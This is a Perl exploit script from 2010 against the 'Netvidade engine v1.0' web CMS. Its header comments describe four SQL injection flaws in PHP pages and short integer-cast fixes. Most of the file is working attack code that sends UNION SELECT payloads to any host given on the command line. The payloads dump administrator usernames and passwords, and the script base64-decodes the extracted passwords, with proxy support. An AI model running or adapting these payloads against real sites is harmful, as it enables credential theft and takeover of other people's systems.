#!/usr/bin/perl -w use strict; use LWP::UserAgent; use Getopt::Long; use MIME::Base64; # \#'#/ # (-.-) # ----------------------oOO---(_)---OOo---------------------- # | __ __ | # | _____/ /_____ ______/ /_ __ ______ ______ | # | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ | # | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) | # | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ | # | Security Research Division /____/ 2o1o | # ----------------------------------------------------------- # | Netvidade engine v1.0 Multiple Vulnerabilities | # ----------------------------------------------------------- # [!] Discovered by.: pwndomina # [!] Vendor........: http://www.netvidade.com # [!] Detected......: 15.04.2010 # [!] Reported......: 06.05.2010 # [!] Response......: xx.xx.2010 # # [!] Bug...........: $_GET['id'] in webtemplate-categoria.php near line 6 # # 3: if ($_GET['id']==0) # 4: $lista_webtemp=$netvidade->lista_webtemp(); # 5: else # 6: $lista_webtemp=$netvidade->lista_webtemp_categoria($_GET['id']); # # The function lista_webtemp_categoria() is in class/var/netvidade.class.php near line 212 # # 212: function lista_webtemp_categoria($id) # 213: { # 214: $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b where a.categoria=b.id AND a.categoria=$id"; # 215: $a=$this->CORE->db(); # 216: $res=$a->abrecursor($query); # 217: return $res; # 218: } # # [!] Bug...........: $_GET['id'] in concorrer.php near line 2 # # 2: $lista_proposta=$recrutamento->lista_proposta($_GET['id']); # # The function lista_proposta() is in class/var/recrutamento.class.php near line 42 # # 42: function lista_proposta($id) # 43: { # 44: $query="select * from recrutamento_propostas where id=$id"; # 45: $a=$this->CORE->db(); # 46: $res=$a->abrecursor($query); # 47: return $res; # 48: } # # [!] Bug...........: $_GET[id] in detalhe.php near line 6 # # 6: $noticias=$a->lista_noticia_detalhe($_GET[id]); # # The function lista_noticia_detalhe() is in class/var/noticias.class.php near line 208 # # 208: function lista_noticia_detalhe($id) # 209: { # 210: $query=" # 211: select a.*,b.id as categoria_id, b.titulo as categoria_nome, c.nome as autor_nome # 212: from noticias a, noticias_categorias b, administradores c # 213: where a.categoria=b.id and a.id=$id and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1) # 214: "; # 215: # 216: $a=$this->CORE->db(); # 217: $res=$a->abrecursor($query); # 218: return $res; # 219: } # # [!] Bug...........: $_GET[id] in newsletter_preview.php near line 6 # # 6: $dados=$a->lista_newsletter($_GET[id]); # # The function lista_newsletter() is in class/var/newsletter.class.php near line 113 # # 113: function lista_newsletter($id) # 114: { # 115: $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON a.id=c.id, newsletter_templates b where a.template=b.id and a.id=$id"; # 116: $a=$this->CORE->db(); # 117: $res=$a->abrecursor($query); # 118: return $res; # 119: } # # [!] Quick fix.....: in class/var/netvidade.class.php line 214 # # - replace: # $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b where a.categoria=b.id AND a.categoria=$id"; # # - with: # $query="select a.*,b.id as categoria_id, b.titulo as categoria_nome from webtemplate a, webtemplate_categorias b where a.categoria=b.id AND a.categoria=".(int)$id; # # [!] Quick fix.....: in class/var/recrutamento.class.php line 44 # # - replace: # $query="select * from recrutamento_propostas where id=$id"; # # - with: # $query="select * from recrutamento_propostas where id=".(int)$id; # # [!] Quick fix.....: in class/var/noticias.class.php line 213 # # - replace: # where a.categoria=b.id and a.id=$id and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1) # # - with: # where a.categoria=b.id and a.id=".(int)$id." and a.autor=c.id and a.data_online <= NOW() and if(a.data_offline != '0000-00-00',a.data_offline > NOW(),1) # # [!] Quick fix.....: in class/var/newsletter.class.php line 115 # # - replace: # $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON a.id=c.id, newsletter_templates b where a.template=b.id and a.id=$id"; # # - with: # $query="select a.*,b.nome,c.corpo from newsletter a LEFT JOIN newsletter_corpo c ON a.id=c.id, newsletter_templates b where a.template=b.id and a.id=".(int)$id; # # [!] Greetings.....: cih.ms and phact.in # if(!$ARGV[3]) { print "\n \\#'#/ "; print "\n (-.-) "; print "\n ---------------------oOO---(_)---OOo----------------------"; print "\n | Netvidade engine v1.0 Multiple Vulnerabilities Exploit |"; print "\n | discovered by pwndomina |"; print "\n | coded by DNX |"; print "\n ----------------------------------------------------------"; print "\n[!] Usage: perl netvidade.pl [Host] [Path] [Target] "; print "\n[!] Example: perl netvidade.pl www.host.com /path/ -t 3 -u 1"; print "\n[!] Targets:"; print "\n -t 1 webtemplate-categoria.php"; print "\n -t 2 concorrer.php"; print "\n -t 3 detalhe.php"; print "\n -t 4 newsletter_preview.php"; print "\n[!] Options:"; print "\n -u [no] User-Id"; print "\n -p [ip:port] Proxy support"; print "\n[!] Notes:"; print "\n For the targets 2, 3 & 4 you can use -u option."; print "\n"; exit; } my %options = (); GetOptions(\%options, "t=i", "u=i", "p=s"); my $ua = LWP::UserAgent->new(); my $host = $ARGV[0]; my $path = $ARGV[1]; my $target = "http://".$host.$path; my $userid = ""; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } if($options{"u"}) { $userid = "+where+id=".$options{"u"}; } print "[!] Exploiting...\n\n"; if($options{"t"} == 1) { exploit1(); } elsif($options{"t"} == 2) { exploit2(); } elsif($options{"t"} == 3) { exploit3(); } elsif($options{"t"} == 4) { exploit4(); } print "\n[!] Exploit done\n"; sub exploit1 { my $url = "http://".$host.$path."webtemplate-categoria.php?id=-1337+union+select+1,2,concat(0x23,0x23,username,0x23,password,0x23,0x23),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+administradores"; my $res = $ua->get($url); check($res); } sub exploit2 { my $url = "http://".$host.$path."concorrer.php?id=-1337+union+select+1,concat(0x23,0x23,username,0x23,password,0x23,0x23),3,4,5,6,7,8,9,10+from+administradores".$userid; my $res = $ua->get($url); check($res); } sub exploit3 { my $url = "http://".$host.$path."detalhe.php?id=-1337+union+select+1,2,3,concat(0x23,0x23,username,0x23,password,0x23,0x23),5,6,7,8,9,10,11,12,13,14+from+administradores".$userid."/*"; my $res = $ua->get($url); check($res); } sub exploit4 { my $url = "http://".$host.$path."newsletter_preview.php?id=-1337+union+select+1,concat(0x23,0x23,username,0x23,password,0x23,0x23),3,4,5,6+from+administradores".$userid; my $res = $ua->get($url); check($res); } sub check { my $res = shift; my $content = $res->content; my @c = split(/\n/, $content); foreach (@c) { if($_ =~ /##(.*?)#(.*?)##/) { print $1.":".decode_base64($2)."\n"; } } }